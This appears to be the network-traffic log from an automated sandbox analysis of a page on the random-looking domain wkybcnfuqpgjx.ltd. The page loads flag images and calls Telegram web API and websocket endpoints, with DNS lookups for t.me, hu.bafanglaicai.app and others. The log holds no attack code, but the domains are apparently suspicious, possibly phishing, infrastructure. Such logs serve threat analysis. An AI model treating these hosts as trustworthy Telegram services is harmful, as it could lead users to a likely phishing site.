Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f7-1f1fa.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1fc-1f1f8.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f8-1f1f2.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f7-1f1fc.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f8-1f1ed.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f0-1f1f3.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f8-1f1f9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f1-1f1e8.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f8-1f1e6.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f5-1f1f2.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f8-1f1f3.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1fb-1f1e8.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f7-1f1f8.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f8-1f1e8.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1fc-1f1f8.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f8-1f1f2.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f8-1f1f1.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f8-1f1f9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f8-1f1ec.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f8-1f1fd.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f8-1f1e6.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiws HTTP/1.1Host: zws2.web.telegram.orgConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://wkybcnfuqpgjx.ltdSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: H+dBaNXrrcviRLMM7xYY/Q==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsSec-WebSocket-Protocol: binary
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f8-1f1f0.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f8-1f1f3.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f8-1f1ee.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f7-1f1f8.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f8-1f1e8.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f8-1f1e7.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f8-1f1f1.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f8-1f1f4.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: wkybcnfuqpgjx.ltd
Source: global trafficDNS traffic detected: DNS query: hu.bafanglaicai.app
Source: global trafficDNS traffic detected: DNS query: t.me
Source: global trafficDNS traffic detected: DNS query: telegram.me
Source: global trafficDNS traffic detected: DNS query: zws2.web.telegram.org
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: zws2-1.web.telegram.org
Source: unknownHTTP traffic detected: POST /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveContent-Length: 0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Origin: https://wkybcnfuqpgjx.ltdSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:03:47 GMTContent-Type: text/htmlContent-Length: 169Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:03:49 GMTContent-Type: text/htmlContent-Length: 169Connection: closePragma: no-cacheCache-control: no-storeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:03:50 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:03:52 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:03:54 GMTContent-Type: text/htmlContent-Length: 169Connection: closePragma: no-cacheCache-control: no-storeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:03:54 GMTContent-Type: text/htmlContent-Length: 169Connection: closePragma: no-cacheCache-control: no-store
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:03:54 GMTContent-Type: text/htmlContent-Length: 169Connection: closePragma: no-cacheCache-control: no-storeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:03:55 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:03:55 GMTContent-Type: text/htmlContent-Length: 169Connection: closePragma: no-cacheCache-control: no-store
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:03:56 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:03:57 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:03:57 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:03:58 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:03:59 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:00 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:01 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:02 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:02 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:03 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:04 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:04 GMTContent-Type: text/htmlContent-Length: 169Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:05 GMTContent-Type: text/htmlContent-Length: 169Connection: closePragma: no-cacheCache-control: no-storeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:06 GMTContent-Type: text/htmlContent-Length: 169Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:07 GMTContent-Type: text/htmlContent-Length: 169Connection: closePragma: no-cacheCache-control: no-storeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 12 Jan 2025 00:04:08 GMTContent-Type: text/htmlContent-Length: 169Connection: closePragma: no-cacheCache-control: no-storeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, OPTIONSAccess-Control-Allow-Headers: origin, content-typeAccess-Control-Max-Age: 1728000
